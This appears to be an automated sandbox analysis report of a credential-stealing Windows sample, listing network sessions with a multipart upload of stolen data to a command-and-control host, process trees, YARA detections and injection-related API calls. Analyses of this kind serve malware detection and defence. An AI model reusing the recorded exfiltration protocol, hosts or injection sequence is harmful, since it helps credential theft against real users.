2024-04-27 11:26:29 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 34 2e 31 36 2e 31 39 32 2e 31 38 35 0d 0a Data Ascii: 11ok 154.16.192.185
2024-04-27 11:26:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49757	172.67.155.93	443	6884	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:30 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1407 Host: palmeventeryjusk.shop
2024-04-27 11:26:30 UTC	1407	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 38 43 42 33 35 37 46 45 34 36 43 38 38 36 32 37 37 43 41 36 33 31 34 41 39 32 32 44 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 47 6c 4d 4d 6e 2d 2d 71 62 0d 0a 2d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"788CB357FE46C886277CA6314A922D48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"pGlMMn--qb-
2024-04-27 11:26:30 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 11:26:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n1kcgi0vjgnm8gcsj2ko1c8e1p; expires=Wed, 21-Aug-2024 05:13:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kcjOs%2BKJ%2BfG0keNt6nJc3UjaDCdauG612j6Hn6hXSFX9B41mA0xkG%2F%2F22OY7ZeUZzI1EkspTjx%2BM9fuQT2cc40e6MyfGidZG0BIzlVagCy4lp7o1datoXKBHxU%2FjoYdzXbjw31tWlp0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87ae7541b84fc461-EWR alt-svc: h3=":443"; ma=86400
2024-04-27 11:26:30 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 34 2e 31 36 2e 31 39 32 2e 31 38 35 0d 0a Data Ascii: 11ok 154.16.192.185
2024-04-27 11:26:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	172.67.155.93	443	6884	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:32 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 314796 Host: palmeventeryjusk.shop
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 38 43 42 33 35 37 46 45 34 36 43 38 38 36 32 37 37 43 41 36 33 31 34 41 39 32 32 44 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 47 6c 4d 4d 6e 2d 2d 71 62 0d 0a 2d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"788CB357FE46C886277CA6314A922D48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"pGlMMn--qb-
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: ac 6d 68 0a 64 57 b2 53 72 08 02 44 00 94 aa 2b 40 8c 96 2c 1b 88 be 7d e5 41 51 a3 71 0b 4e 3f 1a f9 00 ae a3 b3 6e 49 8f d0 c1 fa 92 d0 7b 46 e0 e0 de 79 0e be 0c f6 05 66 80 97 e4 c1 21 21 16 a7 19 0d 90 b0 46 55 06 32 c8 93 80 3c 24 00 fa 58 ba 51 81 05 2e c3 72 4c 54 a3 bb 0d 08 65 83 88 02 14 43 d8 88 7b 4f c1 96 9d b6 22 03 6e b5 be 44 39 d3 e2 56 c0 97 57 71 05 a8 54 67 3f fd 29 68 4a 69 96 c2 51 8b b7 e0 51 ef 31 10 20 0b a6 7b 27 68 6d 34 3a 0c 9d 3f b3 f8 67 21 5e 58 fd d9 3e de ad f7 69 29 81 3f 0a fe 41 f3 1d 7b 0b 98 01 8d d0 86 cf 78 7c ba 80 aa 72 1f 75 6d da e4 98 dc 71 22 66 df 68 f1 9d af e7 63 e0 ce 82 82 dc 35 bc 0b 27 b5 9f c2 d8 f2 fc 9b b5 9e 58 93 a5 77 13 86 05 b8 5e 4f 1b e2 c6 36 6d 9e c3 a4 f6 96 d8 af 71 e7 9c 00 ee f9 17 26 Data Ascii: mhdWSrD+@,}AQqN?nI{Fyf!!FU2<$XQ.rLTeC{O"nD9VWqTg?)hJiQQ1 {'hm4:?g!^X>i)?A{x\|rumq"fhc5'Xw^O6mq&
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: 25 9a 89 7c 35 fe ec 2e 25 d9 fd c5 a1 38 b7 fd c1 61 a5 69 7a e3 af 75 da 54 71 6b e4 07 dc 6e ef af 35 45 ef a2 37 b5 cd ed a0 31 8b 14 4c d6 91 f2 b8 21 7f 72 42 0a 3b ce d7 05 be be e9 cb 0a 31 79 75 e0 5d 7f f6 0e 13 f1 fe a4 e3 46 e5 99 86 12 ae e9 01 fb 8e 3b 39 e6 77 06 c6 92 e4 7c 81 0a 75 3e 7d 96 4b 1d 00 71 b6 46 fd 9f 33 a3 d5 52 4c c0 84 0f a5 64 73 5c b2 51 5c 2c b8 ee 98 96 53 37 fb db 3e 6a c6 58 d3 bf 79 23 e4 1c 55 7e ab 7e 23 b8 51 9a 7c bc 2d 11 1d e9 1e 4c a9 9d ca 46 69 68 d7 ed b6 e7 5d 45 1d 2c 79 3c 58 37 b4 d7 2e 1b 22 d7 4b c6 dd 20 c7 ce 8b ee ff d9 33 ab f6 29 34 63 06 20 3d 28 d7 73 7b 43 8d ff f8 e1 f5 53 04 19 4e 55 6d 4f 73 a1 5a c5 e7 00 b6 fb 99 24 7e ff f6 3f 4e 70 0d 86 cd c9 30 54 0d 54 5e a4 6f 97 6c 28 d1 28 93 31 Data Ascii: %\|5.%8aizuTqkn5E71L!rB;1yu]F;9w\|u>}KqF3RLds\Q\,S7>jXy#U~~#Q\|-LFih]E,y<X7."K 3)4c =(s{CSNUmOsZ$~?Np0TT^ol((1
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: 34 1e 80 dd bc eb 79 39 50 ca 26 90 89 fc 12 ae 38 3f ad 49 18 a0 4a 0a 82 4b 78 ab bc 89 91 57 00 81 f1 80 b3 c7 89 14 a3 52 10 1c 06 67 1c 26 59 eb a2 12 6e 2c b8 bc e5 90 5e 47 49 1d cb 22 5c d7 fc 43 5a 83 50 68 d4 6a 2b 10 7f f5 3c a0 d6 6b cc 8d 1f de ee 08 ae 81 0c 8f 3c 1b c6 1b 9d 07 c1 8f fd c4 c7 83 99 29 27 80 be 3b 18 6d f7 71 d2 75 c7 aa e8 2e b2 cb b5 83 d4 d7 87 79 df dc 37 6b b1 47 4e 8b a7 77 40 c9 60 b4 57 57 7a 16 68 c7 3f 05 64 e0 c7 9f 1a 21 78 78 bc f8 ea d4 71 e5 5e 65 da fd 94 b5 6c 93 b8 a2 bf 95 4c f4 b4 79 d0 17 cb 79 76 26 e3 71 d9 ea d0 4b ce c0 5d 2d b6 05 f1 b4 29 6d 1d c2 9d 95 09 e8 71 99 76 3a 40 5c a0 9d d4 21 6c dc 51 38 09 e0 ce f4 6b c1 81 90 79 72 de 40 36 4e 45 87 30 59 60 d5 b8 fd 22 d7 09 b8 ff ff 17 6c 00 3a 5e Data Ascii: 4y9P&8?IJKxWRg&Yn,^GI"\CZPhj+<k<)';mqu.y7kGNw@`WWzh?d!xxq^elLyyv&qK]-)mqv:@\!lQ8kyr@6NE0Y`"l:^
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: ab 93 4c b8 8c 56 16 c5 ac b8 dd d4 50 90 47 98 00 cf 3a 92 ef 20 23 ba 1d 01 54 2d 6c d3 3f 72 ef e8 84 29 37 f6 b0 8a ca 59 d1 09 28 17 c9 49 7c 8b 4a 38 38 e8 c8 ea a5 41 94 55 06 c2 d0 1d 06 1d 92 18 2a 42 2b e6 d1 d4 94 e5 de b6 61 fd 9a 54 01 a7 f2 c9 0e 2e 89 59 37 8f a2 ec 8d f7 5b 46 24 b6 08 8b 44 76 9f cb 4d 78 a9 aa 90 ec ce 0f d4 ff 9f de ac 9c 79 82 26 a8 d3 53 07 05 6f 99 90 85 c1 54 5b 6d b2 2c 9c 0c f5 9d d6 7d 08 31 0a 3f 5b be e1 aa 78 eb 7f 3e 66 bd e8 18 6e c9 96 18 fb 44 da b6 4d 61 9f c4 fd d3 e1 a5 22 f1 05 6f 31 61 91 61 52 a8 27 05 d5 78 c8 f5 31 a9 6d 6e 7f ca 6a 8e 80 71 19 a6 93 27 b9 ad ab 10 79 7a f5 86 a2 64 f9 42 07 7e 14 cf 78 ed cb d7 bf c4 0b 8d 9c f6 af c7 bb 83 d8 7d f0 cb 52 87 53 61 6e 00 b7 4c 92 4f c8 9a 67 ef 99 Data Ascii: LVPG: #T-l?r)7Y(I\|J88AU*B+aT.Y7[F$DvMxy&SoT[m,}1?[x>fnDMa"o1aaR'x1mnjq'yzdB~x}RSanLOg
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: d1 88 c3 47 7a e5 a9 e7 d9 6f 8e 5e e2 92 db 07 34 c4 19 66 b9 39 20 c1 a1 72 61 41 0e 41 36 d8 40 c2 da 1f fc d2 aa 1c 55 a0 f6 56 1e aa e1 90 02 51 0f 5d 5c 3a 6b c5 83 51 00 67 f5 98 3e 7f ae f8 72 ef de 89 29 34 46 35 26 ef 6a f1 f6 de 8f 2a 87 32 7a 7c bc 30 dc 3c c0 f7 38 c8 bd 58 9b 7b 79 94 f1 e6 a5 3b 2f b7 98 04 8a 39 8e 27 07 70 a0 f6 0d 82 d3 3d 14 8e 67 22 d0 d9 55 61 14 b3 55 37 72 dd 5b 07 8d d4 37 3d ee 6d 4e c7 cc 63 bd 91 2e 58 a8 cd b5 d2 2c 68 98 0c 31 4e 79 57 1f 37 58 29 7d da 1d 5f c8 3e 8d 38 a5 fc 6b 27 e6 e7 e7 8d 8a ff f7 4e 05 e5 54 9e 9b 4e ca 9b 49 6b e0 69 0d d1 86 52 b6 6b 81 9f 78 b2 1e 58 ff ba 71 4d 73 3f 98 97 a1 9b 26 cd b7 18 75 dd b6 67 60 d6 70 e0 c8 04 ee c0 46 3b 77 4d 9a ab fc c9 b0 23 18 6a 05 0a 2f dc 95 39 d6 Data Ascii: Gzo^4f9 raAA6@UVQ]\:kQg>r)4F5&j*2z\|0<8X{y;/9'p=g"UaU7r[7=mNc.X,h1NyW7X)}_>8k'NTNIkiRkxXqMs?&ug`pF;wM#j/9
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: 39 98 92 08 7b 33 e7 43 6f ea f2 1a 1f d2 b2 d8 d4 93 28 fc 58 92 24 f3 41 39 a2 1b 86 e0 11 1f 82 04 d9 96 26 bf 74 c3 bb 7a 47 de 90 38 2c b1 00 75 f9 bb 54 cd ba 24 b3 3a af 50 42 df ff 97 be e5 82 1f 8e d4 66 5d ea be 62 e1 50 94 e1 3f 1d 9c 28 d7 4c ce 6e 45 6e 5a 64 c1 5d 60 45 c2 1c 03 c9 0f 09 fb 50 b0 a3 18 ee bd 1d cd 50 d6 71 04 7f f8 f6 d7 ad 9e d8 db 77 c3 7c 09 12 26 b5 33 44 d7 57 1e a6 09 2b 6a c8 64 42 93 61 fd 69 0e 77 c6 28 11 11 4f 70 78 ff d9 28 bb a7 7f a6 94 f7 a9 c5 0d 1e b9 2a f0 43 fb ab d4 f2 49 89 b6 28 5b c1 e2 22 db 92 02 fc 9a ea 8a a9 14 e1 76 0e e6 66 37 6b 23 ee 85 38 23 87 40 20 db 66 66 20 c1 37 35 ea c8 22 5b 0a 90 68 1f ab 8e f0 bc 5c 12 ec ea 18 c1 44 07 61 22 cc 7c 6e af 57 e4 dc 8b 2a 9d 72 c8 74 4e c6 1c 8b 01 a4 Data Ascii: 9{3Co(X$A9&tzG8,uT$:PBf]bP?(LnEnZd]`EPPqw\|&3DW+jdBaiw(Opx(CI(["vf7k#8#@ ff 75"[h\Da"\|nWrtN
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: 6e 5a 44 be 3b 1e fc 89 4c 04 94 9a 17 7b 44 31 87 e8 21 dd bb 04 81 88 69 b9 b9 3c 79 13 f3 29 63 7b 93 94 51 82 a3 c1 0d 65 2b 0a 44 3d 7e c7 7b f0 a6 84 2e 5e 42 25 de 65 28 4c 3e bd 32 52 6a c8 9f 7c 2b 08 ad bc b9 dc 93 23 bf f4 0d 8d 74 3c 88 b8 e9 60 60 ea 44 d7 3b b5 f8 cd 35 72 f7 a3 61 e2 86 83 cc 8a c0 a2 c4 42 a1 0d ca 42 b2 98 6c 94 0a aa aa f2 b9 33 56 9e f4 6e 36 91 24 f5 53 ca c0 67 31 78 b6 73 9f a9 57 46 ad ec f5 e7 9b ca 99 fd 79 c2 fa 64 df a4 ff 04 8f 83 d1 41 fe a6 8d 4a ec 49 3d 76 f3 5c 65 91 7a d0 bd 47 46 99 b3 35 d7 57 37 fc 87 1e b2 aa d3 4f 58 5a 4e 7c 5c f0 5e bb f6 7e c1 7b b2 a4 84 6a f6 7f 1e 72 7a 7e 6b ea 1f d2 2f f7 ea c3 ab fb d4 54 f7 cb 83 04 5a f3 f1 b7 12 df a7 cf d1 af 25 cc f5 6a db b1 83 b0 de c3 5e 4f ed bc bc Data Ascii: nZD;L{D1!i<y)c{Qe+D=~{.^B%e(L>2Rj\|+#t<``D;5raBBl3Vn6$Sg1xsWFydAJI=v\ezGF5W7OXZN\|\^~{jrz~k/TZ%j^O
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: 41 65 b1 2a ea 6a b2 ec c8 16 bc de 1d e0 59 95 49 a4 d3 15 10 8d b6 a4 2e b4 c3 8e 8e 24 33 c0 7e d6 77 e2 62 33 0d 05 3e 48 5d 92 52 26 57 4b 2e fc 30 7d fc 97 29 be fc ef 71 44 d3 ac bc d0 a4 0b 1d 12 6c da 4c c7 cf a6 41 43 dd a1 e7 8b db 86 9e 57 07 ed ee 32 9c f7 c7 d1 51 1f 8c 54 d0 b9 53 86 a0 2a be e1 49 02 59 1d 3d 33 dd 33 7c d8 91 18 1b 6a 13 b2 25 2e d4 5d 50 65 2b 14 df 8a 9a ba 5c 2d 18 f1 bf 72 d1 69 b5 99 db 70 a6 8d d3 f9 4d 8c 17 a5 ca 6c 74 8a e5 f4 cb b5 5b bb cb 61 ff ef 51 44 98 0a 22 94 46 36 f8 69 dd 11 5e 09 97 85 9d f4 25 cc ec 3d 8b 28 c6 b2 fb da ee cc fd cf 00 3b dd e9 ed ee fc 5c cb 87 38 04 d1 cc 07 e2 ef a6 41 bb 67 84 fa 49 ac bc db df 5d d6 06 41 48 26 be 4f 7e a6 74 b6 38 6d 4f ca f6 9d 64 f6 8e 0c d4 1e cf 0d d4 9a 08 Data Ascii: AejYI.$3~wb3>H]R&WK.0})qDlLACW2QTSIY=33\|j%.]Pe+\-ripMlt[aQD"F6i^%=(;\8AgI]AH&O~t8mOd
2024-04-27 11:26:32 UTC	15331	OUT	Data Raw: 01 8c 2a 22 06 5a 14 b4 61 9a 09 b8 7b ae 7d 0e bc 85 a0 bd 59 19 e2 af 93 53 98 11 80 e1 45 29 17 50 3d dc 15 c1 9b 04 24 47 c6 8a 3d 64 e4 76 e6 9f 9b 07 43 b8 19 51 cc 01 3d 79 77 ab 9a 35 cc 21 23 ba ff d1 a9 26 5d 2b 38 02 0e f5 93 7c 49 a7 bd 01 d9 9a 98 85 f5 b1 f2 6b 4e 91 58 16 5f d0 a5 44 40 9e 32 2a 09 45 8a 44 5c dd de 8a 5f 66 7d 68 71 c5 96 e5 d4 3a 63 e0 b6 fd 6a 5f a2 be e6 3c 34 94 e8 f4 66 e7 77 3a 7b 91 1d 9b 0a b6 99 ac db c0 15 3f 8c 64 9a 33 9b 00 9b f8 c3 32 4f 92 f9 2f ef 34 3f 8d 29 42 64 81 f2 f2 c7 32 97 e6 dd d3 85 04 f0 c1 97 f8 d3 ea 5c ca 29 b2 cd 8e b7 8e a9 df b4 81 60 8b ee 4f c4 39 f1 56 a2 eb 0c 4c d7 8b fe 7e e8 b9 2e cc 0c 5b 78 e0 63 e4 e4 81 22 28 ea 49 c8 f3 8a 8d be 6a d5 b7 b7 98 e4 75 af 2b 3e 2c 0a 36 4c 20 77 Data Ascii: "Za{}YSE)P=$G=dvCQ=yw5!#&]+8\|IkNX_D@2ED\_f}hq:cj_<4fw:{?d32O/4?)Bd2\)`O9VL~.[xc"(Iju+>,6L w
2024-04-27 11:26:34 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 11:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m27m1pdcptjcvpfr37810amttc; expires=Wed, 21-Aug-2024 05:13:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOLZMsQz8DG2%2B0U%2Bx0FpekuST9Vth58U32dngUD20qJcDBETdH4B%2Bv9FTAj8IkVAYajCVyEIrZDaB8kEoeIIO7v3cAP8%2FGzv0MvZPzqCjaDI92WpiJ%2FaY4D49nQAw63VwE92ECE9kUk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87ae754a8a5c43b3-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49760	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:54 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HaV2Hha+omFEa1E&MD=EgGFr8F4 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-27 11:26:54 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: dd7982ee-7004-4cb1-86b7-d0c28ba51cf4 MS-RequestId: 222cfe0c-748c-430a-975f-e28e52aefcb2 MS-CV: OkTd20gBUU+xhCdF.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 27 Apr 2024 11:26:53 GMT Connection: close Content-Length: 25457
2024-04-27 11:26:54 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-27 11:26:54 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	13:25:52
Start date:	27/04/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	1'800'704 bytes
MD5 hash:	24DD75B0A7BB9A0E0918EE0DD84A581A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:25:57
Start date:	27/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	13:25:58
Start date:	27/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:25:58
Start date:	27/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,17816864313725949295,15185844490458716427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:25:58
Start date:	27/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2004,i,15247930655043870069,15177389296022328392,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:26:24
Start date:	27/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,17816864313725949295,15185844490458716427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25.1%
Total number of Nodes:	459
Total number of Limit Nodes:	35

Executed Functions

Function 023AF57F Relevance: 11.2, APIs: 7, Instructions: 730memorynativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 023AF618
NtMapViewOfSection.NTDLL(?,00000000), ref: 023AF6C0
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 023AFA34
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 023AFAE9
VirtualProtect.KERNELBASE(?,?,00000008,?,?,?,?,?,?,?), ref: 023AFB06
VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 023AFBA9
VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,?,?,?,?), ref: 023AFBDC

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

